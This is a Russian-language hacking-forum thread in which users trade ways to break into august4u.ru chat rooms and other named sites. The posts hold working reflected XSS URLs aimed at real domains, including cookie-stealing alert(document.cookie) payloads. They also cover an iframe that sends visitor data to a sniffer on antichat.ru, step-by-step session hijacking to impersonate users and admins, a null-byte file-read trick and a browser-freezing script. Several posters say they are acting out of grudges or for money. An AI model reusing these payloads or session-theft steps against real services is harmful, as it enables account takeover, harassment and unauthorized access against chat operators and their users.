Кто знает уязвимости в чатах августа просьба отписаться ... За ранее благодарен .

Для примеру вот этот чат http://www.freeman.august4u.ru/

Тогда выкладывай что знаешь )))))

Да было бы интересно узнать какие уязвимости есть в чатах августа. Кто что знает просьба помочь..

Насколько я знаю их там нет.

касеков в банках тока нет ито их взламывают а чат это что? да нечего можно тока как?!! и чем?

покрайни мери если умеешь почту ломать то взломай почту админа и там у него пороль!!! 100% или соц инженерией можно тоже ты тока подумай все реал!!

Сомниваюсь что взломав почту получишь полный доступ к вгустовским чатам....

Нет, пароль в любом случае изменён, а секретное слова на почте нет.

вобщем кагда они регятся им на ящик присылается пароль и ник!!! так в чем проблема!!! если ты почту ломать неумеешь это твоя проблемма!!! тут тебе некто непоможет!!! учись смотри видео!!!

ко всем августинским чатам чтоб получить доступ нужно взломать сервир!!!
тебе так хочется в терьму? ты хоть простой чат взломай а то сразу августино!! у них неодного порта открытого нет !!!

Пароли которые высылают на мыло как правило меняют. А вот о том что там всё закрыто, то ты прав.

ни пороли меняют на такойже как и у ящика

ну я там нашол немного бырок!!! тока ненаю как ими воспользоваться!!!

Я ж говорю, всегда меняют пароль. Нет смысла лезть на почту, за несуществующим паролем. Если только какой нибудь идиот его не сменит.

все Антоха2003 я вычисли кто ты !!!! я forever

Кто я?=)

я тебя в чате встречал ище говорил знаком мне твой ник непонмишь чтоли?

Было дело, я потом вспомнил о чём мне говорит forever.

мой ник в чате был и есть "forever"

Ну значит словимся как набудь.

И УМЕНЯ ТАКАЯ ЖЕ ПРИЧИНА НАСЧЕТ.ЧАТА www.sukhumi.august4u.ru чат на августе..если что нпишите на почту georgia8@mail.ruКто знает уязвимости в чатах августа просьба отписаться ... За ранее благодарен .

Для примеру вот этот чат http://www.freeman.august4u.ru/

некто вам непоможет!!!

Не ломаются они, не было таких счастливчиков ещё=)

скажут тогда кагда еще лучше будет!!

Чёт всем так хочется августа сломать)

ну у него 1600 человек в день а мож и больше!!! а народу наравется где людей много!!

Да не в том дело, чатов августа стало много, всем хочется быть админом, кого то давит жаба, типа "Почему он админ? Я тоже хочу!" и вот начинается, надо сломать этот чат, ещё и этот=)

народ есть тема прикольная вот сылка http://chat.kemernet.ru кароче это чат егобы помучать ну поломать а то вот думаю уже 2 года как его ломануть хоть и был я админом но толку мало охота чтоб вобще лапки загнул!!!

Почему толку мало? Почему был? ЛОмать не умеешь или не полусается?

ЗДРАТСВУЙТЕ. на этом сайте есть кто на самом деле разбираеться во взломах.. нужна помощь для взлома(дружеского) чата на августе а именно www.sukhumi.august4u.ru .ИЛИ опдскажиет полезные проги или пишите georgia8@mail.ru .зарание спасибо

ёпть. только один способ есть, наебать глав. админа. узнать пароль. а вот там делай что хочешь. но при реге чата, админ вводит секретное слово, так что он в любой момент может узнать пароль. безнадёга=)

хех... на данный момент чат на августе вроде самый устойчивый...
хотя так было не всегда...
был у меня один знакомый... года два-три назад он поломал августовский чат, в котором мы с ним вместе сидели =) но тогда хз как он это делал =)
а сейчас отсиживает за кражу БД фирмы в которой работал... =(

0.5% разбираеца -)

кто разбирается?

Чаты августа:
http://www.august4u.ru/calendar/?year=<script>alert(/tested_by_censored!/)</script>

Правда я там не регился и незнаю что там в куках храниться и если подкинуть - сработает или нет.

А кто нибудь знает, есть ли фудер именно для августовских чатов?

при проверке Xspider на уязвимости обнаружил
- порт 110/tcp
сервер POP3 - получение почты (не работает)
<нет данных>

найдена уязвимость
вероятно DoS-атака (размер буфера 10Кб) >>>>>

подскажите что делать дальше

Народ, подскажите как зафлудить чаты august4u хоть чем, хоть никами, хоть мессагами.

ребята, скорей всего просто мы не умеем ломать эти чаты, а так, если подумать, ломать можно всё...

при проверке Xspider на уязвимости обнаружил
- порт 110/tcp
сервер POP3 - получение почты (не работает)
<нет данных>

найдена уязвимость
вероятно DoS-атака (размер буфера 10Кб) >>>>>

подскажите что делать дальше
а что ты сканировал??? причем тут сканирование сайта и чата?? чат нельзя сканировать это ты сайт сканировал...лол...а что касается флудера то можно написать своими руками на простом ХТМЛ и Жабе...даже здесь на Античате есть статья про написании флудеров...читал и пробовал на одном из престижных сайтов и получилось!

А где конкретно написано, или дай что писал ты. я нашёл где Algol писал о том как inetcrack'ом флудить, но не получается.

все что создона человеком тоже им и будет взломано))

вот такая вот тема я нашол ну или ктото еще
http://blackcamel.ru/people/?id=<>

вот можно ченить или дефйс или ченить смостерить
в место <> чкрипт написать!!! ну должноже както ламонуться!!!!! август ломанут !!!!!! я уверен тока не сейчас ну ломанут!!!! и тогда будет круто!!! ;) а вобще врядли!!! это все надо между некоторыми хакерами "!!! без ламеров!!! так как на августинских чатах можно хорошо заработать!!!! там много люде кто заплатить да еще и как) ;) ну смотрите сами тока незакрывайте эту тему !!!! август толжен сломиться!!!!

так как всётаки взломать чат?

все что создона человеком тоже им и будет взломано))

вот такая вот тема я нашол ну или ктото еще
http://blackcamel.ru/people/?id=<>

вот можно ченить или дефйс или ченить смостерить
в место <> чкрипт написать!!! ну должноже както ламонуться!!!!! август ломанут !!!!!! я уверен тока не сейчас ну ломанут!!!! и тогда будет круто!!! ;) а вобще врядли!!! это все надо между некоторыми хакерами "!!! без ламеров!!! так как на августинских чатах можно хорошо заработать!!!! там много люде кто заплатить да еще и как) ;) ну смотрите сами тока незакрывайте эту тему !!!! август толжен сломиться!!!!
http://blackcamel.ru/people/?result=info&nick=%3Cfont%20color=red%20size=30%3EHACKED%3C/font%3E

Авось на такой дефейс кто нибудь купиться =))

http://blackcamel.ru/people/?result=info&nick=%3Cfont%20color=red%20size=30%3EHACKED%3C/font%3E

Авось на такой дефейс кто нибудь купиться =))
Или так...
http://blackcamel.ru/people/?id=&result=info&nick=%3Cscript%3Ealert%28%2FHACKED%2F%29%3C%2Fscri pt%3E

Или так...
http://blackcamel.ru/people/?id=&result=info&nick=%3Cscript%3Ealert%28%2FHACKED%2F%29%3C%2Fscri pt%3E
Равносильно =)))
Все равно я нашел =)) :cool: :cool: :cool:

А вот продолжение...СЮДА (http://blackcamel.ru/people/?id=&result=info&nick=%3Cscript%3Eprompt(/Enter_command/,%20/Xak_this_site/)%3C/script%3E)

Или вот...Go ( http://blackcamel.ru/people/?id=&result=info&nick=%3Ca%20href=http://antichat.ru/%3EGotoAntichat%3C/a%3E)

А вот к снифферу... Хотя ничего не отсылается... ((
Перейти... (http://blackcamel.ru/people/?id=&result=info&nick=%3Ciframe%20src=http://antichat.ru/cgi-bin/s.jpg%20width=1%20height=1%3E%3C/iframe%3E)

Хотя всетаки отсылается Ip адрес, но думаю много он не даст... Для обшего развития пойдет...

оп идее, если ссылку со скриптом, отправляющим куки на снифак подослать админу, его куки должны слиться... тока лучше ему незаметно впарить

должно получится :)

вот и попробуйте, у кого время есть

Нихрена не получиться! Попробуйте сначала зарегиться, потом авторизовавшись перейти по этой ссылке!

Хех. Толи отсюда стучат, толи админ тут лазит. Прикрыли прошлую XSS.
Вот еще две:
http://www.august4u.ru/calendar/?year=124&theme=1234567><script>alert(/tested_by_censored!/)</script>
http://www.august4u.ru/calendar/month?theme=><script>alert(/tested_by_censored!/)</script>&month=1&year=124

поидее если будет доступ в админке к тегам чата или новостной ленты то можно побаловаца...
(З.Ы. как Антошка2003 в правилах чата)

есть в киле небольшое но! - можно забанить чела на более больший срок, подставив свои значения...
сёння это я писал тут http://forum.antichat.ru/showthread.php?t=4888 до того как заметил эту тему...

забыл сказать если неошибаюсь.. ес в киле поменять значение name=id value=73aa8dc48351d9fb на чужое то можно кинуть от чужого ника....

вот научица бы ещё поднимать свои привелегии в чате.....

Ахренеть! Оперативно. Уже пофиксили. Ну ничего... еще есть в неожиданных местах.

да я это уже давно продумал.... главное поднятие привелегий....

и есчо в страничке чата /killwin.html скрипт

<body scroll=no bgcolor=black><script>setInterval ("focus ()", 10); w = open ('','','fullscreen=1'); w.document.write ('<body scroll=no bgcolor=black>' + document.body.innerHTML + '</body>')</script></body>

вот защитица бы от такова бана бы....

Поставь себе Файервол. Если резать не будет - сам кусок пропиши, что он вырезать будет.

да я это уже давно продумал.... главное поднятие привелегий....

и есчо в страничке чата /killwin.html скрипт

<body scroll=no bgcolor=black><script>setInterval ("focus ()", 10); w = open ('','','fullscreen=1'); w.document.write ('<body scroll=no bgcolor=black>' + document.body.innerHTML + '</body>')</script></body>

вот защитица бы от такова бана бы....


так как она защищает?

forever777, я всмысле - када чела килл или админ когда кидают из чата с зависанием компа то открываеца страничка к примеру: http://august4u.ru/killwin.html и твой комп висит от этой шняги...
********
censored!, попробую.. думаю прога AdMunch тож подойдёт..
********
http://demo.august4u.ru http://demo.august4u.ru/admin/??
Login: demo
Pass: demo
Демо админки августа (тама всё только для чтения стоит:( ...)

Была дыра по сеиссии из админки demo, в админку заходишь, подставляешь свои значения. Но эту дыру вроде перекрыли чтоли. Сам не пробовал правда.

помните недавний конкурс от xakep.ru на падонке... тама была новосная лента - ждём баблос и т.д. в верху писалось число, месяц, год, эра. к примеру 25.04.05.n в строке браузера выглядело
....php?day=25&month=04&year=05&era=n
подставив следующее:
http://padonak.ru/cgi-bin/about/news/news.php?day=&month=&year=/index&era=php%00
http://padonak.ru/cgi-bin/about/news/news.php?day=&month=&year=/param&era=pl%00
http://padonak.ru/cgi-bin/about/news/news.php?day=&month=/&year=/news&era=php%00
можно было почитать index.php, param.pl, news.php. :)

в анкетах августа привыдаче ошибочного сообщения - "ник незарегестрирован" вначале пишется ">>"
пример: http://august4u.ru/people/?id=&result=info&nick=
может тут можно чтолибо подковырнуть???? :confused:

в анкетах августа привыдаче ошибочного сообщения - "ник незарегестрирован" вначале пишется ">>"
пример: http://august4u.ru/people/?id=&result=info&nick=
может тут можно чтолибо подковырнуть???? :confused:

Смотри предыдущие сообщения!

Или так...
http://blackcamel.ru/people/?id=&result=info&nick=%3Cscript%3Ealert%28%2FHACKED%2F%29%3C%2Fscri pt%3E

так че реального дефеса нельзя зделать? :confused:

все в видео много раз ломали через страку браузера мне кажется и щас у вас получится

в августе есть возможность разговора от чужого имени (возможно юзание админки и т.д.) через сесию.....
узнаю чужую сессию и
чужой id: (sess=1744f6b611019d6eb93aeccb05aaf934 id=12715728695d764c id2=3252)
потом через LocationReplace вставляю значения к примеру в http://www.august4u.ru/mess.php?sess=1744f6b611019d6eb93aeccb05aaf934&id=12715728695d764c&id2=3252.
вот и всё... работает пока на другом конце не выйдут из чата...

так а как узнать эту сесию?

так а как узнать эту сесию?
сесию узнал - послав личное сообщение с картинкой снифера. (если тока есть доступ:
доступ к общим HTML тэгам
доступ к стилям в HTML тэгах
индивидуальные HTML тэги и в админке разрешён тег img)
а вот id пришлось спросить.
думаю проще будет самому зайти в чат под 2-мя никами и поэксперементировать...

жаль что немогу проэкспереминтировать чат тупит у августина как всегда)

кстати вот еще какойто файл http://erodrom.august4u.ru/admin/admin

и всетаки как узнать id ? мне кажется невозможно!!!

и всетаки как узнать id ? мне кажется невозможно!!!
Ошибаешся... :)
Я сегодня всю ночь думал как и коечто надумал...
И уже протестил! всё работает!... :D
Возможно сегодня запишу видео... ;)
(зависит от напряги с работой)

мне кажется нестоит тока видео записывать пока ну можно канечно ну ты можешь реально заработать денег за это все щас много кто за то чтоб сервис взломали заплатят нармальные деньги!! мне лично придлогали за 1000 ну я еще пока не ломал!!

кстати вот еще какойто файл http://erodrom.august4u.ru/admin/admin
файл стилей :D
Возможно сегодня запишу видео...
лучше словами =)

мне кажется нестоит тока видео записывать
но рассказать народу то надо? =)

строка привата:
http://www.august4u.ru/private?sess=bda9911aea74c4750b6eecae77987677&id=67c9hrb16a206102&id2=258
отсылаем фразу c картинкой (нужен доступ к HTML):
http://antichat.ru/cgi-bin/s.jpg
получаем id собеседника, а затем используем IE_XSS_Kit, вот и всё.

ладно пусть канечно запишет видео!! непомишает да и вобще надо понять рейтинг августина))) а то он там оборзел был такой случай так он сцука оборзел не в чем не уступает взвысел себя в короли!!!! давайте покажите ему как надо))))

если запишешь видео то отправь его мне лии kez чтоб он его опублековал!!!!

а горили что августина не уязвим!!!! все уезвимо прото мозги надо!!! и опыт!!!

строка привата:
http://www.august4u.ru/private?sess=bda9911aea74c4750b6eecae77987677&id=67c9hrb16a206102&id2=258
отсылаем фразу c картинкой (нужен доступ к HTML):
http://antichat.ru/cgi-bin/s.jpg
получаем id собеседника, а затем используем IE_XSS_Kit, вот и всё.


если ты не будешь записывать видео то скажи как ты узнал строку привата!!! :confused:

Думаю тут точно админ августа шастает... даже незнаю как его нехорошо и назвать... теперь строка привата выглядит вот так:(
http://www.august4u.ru/private?id2=2312&private=1
а видео есть и то очень сырое... и то я в нём id узнал спросив....
даже нет смысла его размещать:(
а строку привата несложно узнать :) в эксплорере есть волшебная кнопочка, F11 называеца, думаю ты на клавиатуре её найдёш...:)

Угук. Шастает. Сколько Xss вывешивал - прикрывает. Теперь не вывешиваю =)

тогда придется пока самому !!! потмучто некак непогорить ткоа по аськи с оприделеным пользователем или по irc чату так получатеся

ну ничё... ишо чтонито найдём....
да и ешо, раз здеся админ августа лазиет тогда следующее для него:
добавь ф-ию вызова собеседника, web-ftp (хотяб 5 метров на каждый чат
чтоб к примеру хранить картинки, флешки и пр. для диза),
HTML редактор шоб писать теги, приветствие и прочее в таком виде к примеру:
<img id="reflect" src="image.jpg">
<br>
<script language="JavaScript1.2">
function f1(){
setInterval("mdiv.filters.wave.phase+=10",100);
}

if (document.all){
document.write('<img id=mdiv src="'+document.all.reflect.src+'" style="filter:wave(strength=3,freq=3,phase=0,lightstrengt h=30) blur() flipv()">')
window.onload=f1
}

</script>
(отражение в воде), а не в одной строке... подробнее на:
http://live-co.com/rus/forum/index.php?showtopic=407
другими словами некие ф-ии что и в админке на http://mpchat.ru (http://mpchat.ru/)
да! и бота ешо и его настройкой параметров ответа...
на этом покашто всё:D будут вапросы - мыль....

Да, бота бы кстати не помешало бы в чатик, прикольная штука=)

ты че эти боты это тупость!!!

Ну поставить ф-цию вкл/выкл бота. Если по уму всё написать, то нормально будет. У меня например вызывает улыбку, когда новички начинают с ним спорить и т.п.

эх... помню я своего бота-лесбиянку.... и как с ним в чате спорили...

Прикольная штука этот бот, в конце концов кого он не устроит моут и в игнор загнать=) а чё с этой лисбиянкой случилось?

да ниче, просто на чат забил и снес его :)

А у тебя остались исходники на бота?

это вуду чат был.... там он есть встроеный, а самих выражений у меня нету... не сохранил.

Блин, плохо)

бот ваапще клёвая штука, если над ним хорошо поработать, то шонито реальное да получица, а то глядиш и обучиш его чтонито впаривать юзерам ;)
Антох, а ты поищи бота в поисковиках, я нарывался на проги ботов, но опробовать немог, народ.ру, сам понимаеш:d

В принципе могу дастать исходник, знакомый мутил, но долго ждать, можно с интер чатов посливать, посмотреть систему. Но в августа ты его не всунешь я думаю. Ладно, будем думать. Ты сам не пропадай, в ПМ пиши или аську.

у меня ася в сетке неработает, ес тока на серваке... Sim 0.9.3 ставил, так и то через раз пашет... да и ваще, ася меня невтыкает... а ес август бота забацает то я думаю нехуже тех что уже есть в других чатах...
кстать поменялось разделение привелегий между килами, но я думаю чтонито да намутить получица... ща меня кила лишили за бурагоз, но ничё....

ПОсмотрим...

А че вообще мона сделать с чатом, имея пассворд глав.админа?:))

наверное многое

По ходу я не очень точно объяснил то, что имел ввиду. Я знаю, что многое можно с ним сделать:) мне инетересно, что можно сделать ещё из того, чего нету в админке?

ты неясно задал вопрос, в админке можно сделать всё, почти всё.

Я глав.админ в одном из чатов августа и хорошо знаю что можно делать через их админку :) Мне интересно что можно сделать ещё из того, чего нет в админке..

ничего больше.

август пользуется вот этим хостом http://www.layeredtech.com

Мой друг Agressor за 5 мин ломает и научился сдесь всему... так что ещё реально

так Максим Левин тоже взломает если захочет!!!

форев, веди тогда админа афгуста вот сюда:
http://layeredtech.com/client/index.php?msg=<script>alert(document.cookie)</script> (http://google.ru) :)

_http://august4u.ru/mychat/?reg=&sess=&Sex=1&Age=123&Status=1&Earn=100&Chat=0&url=123&Pay=5&Info=123&email=123@123.ru;<script>alert(document.cookie)</script>&submit=%C3%EE%F2%EE%E2%EE

красавец censored!))))

да я неверю что августавские чаты неломаются или хотябы нельзя там как нить поглумится?! фбр ломают фсб ломают а какоито август чат задрипаны немогут?!?

однако)))от программистов зависит!

да я неверю что августавские чаты неломаются или хотябы нельзя там как нить поглумится?! фбр ломают фсб ломают а какоито август чат задрипаны немогут?!?
да вы што прям августински чат задрыпанный? несказать !!! :D вроде лучше чем августа чата нету !!! :rolleyes:

НЕ НУ ВСЕТАКИ!)))КАКИМИБЫ ОНИ ХОРОШИМИ НЕБЫЛИ НАДО ИХ......ВЗЛОМАТЬ ИЛИ ЧЕ НИТЬ СДЕЛАТЬ ОТО БЕСИТ УЖЕ!)

Взломать просто так - вряд-ли.
Сам админ и модер в нескольких августовских чатах.
Что-нибудь сделать - читай форум внимательно. Уже описывали достаточно много способов и незначительных уязвимостей.

СЛУШАИ ДАИ МНЕ ТВОЮ АСЬКУ Я ТЕ ПОСТУЧУСЬ ПОГОВОРИМ!)

Такс ребятки, взломать август4у однозначно возможно и при этом не надо ломать весь сервак и БД !!!! я не говорю за старые взломы , буквально месяц назад был взломан бат.августчу !!!! Признаюсь очень мерзкий чатик, у меня на него тоже зуб был за их тематику "секс и наркотики" , я испробовал всё что мог но всё было до фени.... Дело в том что август4у натыкан всевозможными способами защиты и функциями типо графических ников и тд, естественно в ущерб скорости, но это никого не ипёт!

А теперь давайте обратим внимание, что август4у , представляет собой не выделение комнаты как на www.smchat.ru , а именно домин третьего уровня! Какой из этого вывод? А вывод такой: Это не сервис чатов, а практически домен второго уровня, как на народе ру или ему подобном. А чем отличается домен 3го уровня от сервиса чатов и комнатки в нём не знаете? А тем, что в случае www.smchat.ru нет выделённого фтп для каждого админа, а вот на август4у ОН ДОЛЖЕН БЫТЬ !!!! А что если попытаться узнать шаблон FTP ссылки, а потом уже попробовать подобрать пароль? Помоему, тут надо копать и ломать их непосредственно как FTP шник, а не как чат!

А теперь давайте обратим внимание, что август4у , представляет собой не выделение комнаты как на www.smchat.ru , а именно домин третьего уровня! Какой из этого вывод? А вывод такой: Это не сервис чатов, а практически домен второго уровня, как на народе ру или ему подобном. А чем отличается домен 3го уровня от сервиса чатов и комнатки в нём не знаете? А тем, что в случае www.smchat.ru нет выделённого фтп для каждого админа, а вот на август4у ОН ДОЛЖЕН БЫТЬ !!!! А что если попытаться узнать шаблон FTP ссылки, а потом уже попробовать подобрать пароль? Помоему, тут надо копать и ломать их непосредственно как FTP шник, а не как чат!


HTTP Server : ON
FTP Server : OFF
POP Server : OFF
IMAP Server : OFF
SMTP Server : OFF
SSH Server : OFF
august4u.ru's IP : 84.19.184.16

HTTP/1.1 200 OK
Date: Sat, 08 Apr 2006 09:50:41 GMT
Server: Apache
X-Powered-By: PHP/4.4.2
Expires: Thu, 01 Jan 1970 00:00:01 GMT
Cache-Control: no-store, no-cache
Pragma: no-cache
Last-Modified: Sat, 08 Apr 2006 09:50:44 GMT
Connection: close
Content-Type: text/html; charset=windows-1251

САМУРАЙ - удачи :) :) :)

http://rmsoft.kolov.ru/downloads/rmf/rmosc.zip (http://google.ru)
Утилита для быстрой смены User-Agent'oв в http-заголовках в - Internet Explorer, Mozilla, Firefox. с помощью этой проги можно будет обойти бан в augustовских чатах. + смена прокси! Проверео

Возможно августа можно взломать через его доп модули к чату типа календарь, тетрис, и так далее.
Раньше когда у него был форум его ломали точно помню, я заходил в его чат у меня была админка, незнаю как она у меня появилась в нафигации ,правда у меня был чат на сего сервере вот и там я снес все тоесть дизайн,настройки и все остальное он потом это закалибался востонавливать закрыл мне чат еще сволочь )). Все это было когда он менял полностью функции к чату тогда их было всего 10 или 13.

так скокаж времини то прошло.. вспомнил 2002-2003года.. :) уже всё залатано...

чето ссылка твоя нескачивается (( кинь еше раз понормальному! а августавские чаты меня бесят пипец как!!! когда их взломают я буду гулять в полную силу месец и всем бутылку поставлю:)))

1) У тебя и нескачается, полтомучто hands.dll нету...
2) эти чаты - самые лучшие по скорости работы, трата малого кол-ва трафика и уйма возможностей, такчто если ненравятся то п**дуй на chats.ru, я даже видео для тебя напишу как chats.ru ломать... :)
3) можеш уже проставляца ;)

чето ссылка твоя нескачивается (( кинь еше раз понормальному! а августавские чаты меня бесят пипец как!!! когда их взломают я буду гулять в полную силу месец и всем бутылку поставлю:)))

Раз (http://www.mozilla.com/products/download.html?product=firefox-1.5.0.3&os=win&lang=ru) + Два (http://forum.mozilla.ru/viewtopic.php?id=3149)

Я знаю на августе тока 1 багу, там если попросить админа дать ссылку на мою например анкету ... он даст ссылку со всом хешем... потом зайти по линку из нового окна и можно себе привелегии поставить... , а там уже можно ченить придумать ...

Даст он ссылку со своим ID, но не все админы лопухи... а дальше нечего думать, IE_XSS_kit в руки, загружаеш чат, в поле ввода логина и пароля жмёш правой кнопкой, выбираеш пункт "!XSS: LocationReplace", а дальше в сценарии подставляеш его ID, к примеру было httр://august4u.ru/index.php?sess=7cf7958feb71acb49afb343b4d4d79b2 , как подставиш то будет httр://august4u.ru/index.php?sess=7cf7958feb71acb49afb343b4d4d79b2&id=9ab8166efa жмёш ОК и ты в чате под его ником. Тамже и анкеты чужие можеш забанить, привелегии убавить и т.п., но не удалиш и в админку не попадёш ;) Фишка и с обычными юзерами катит, если узнаеш ID какованито юзера то можно пофлудить фразами от его ника, при помощи инет кряка, ну а дальше сам прекрасно знаеш :) Да ивообще эта тема изъедена до дыр :) Закрывать пора имхо....

Ну я думаю разобрались так что Closed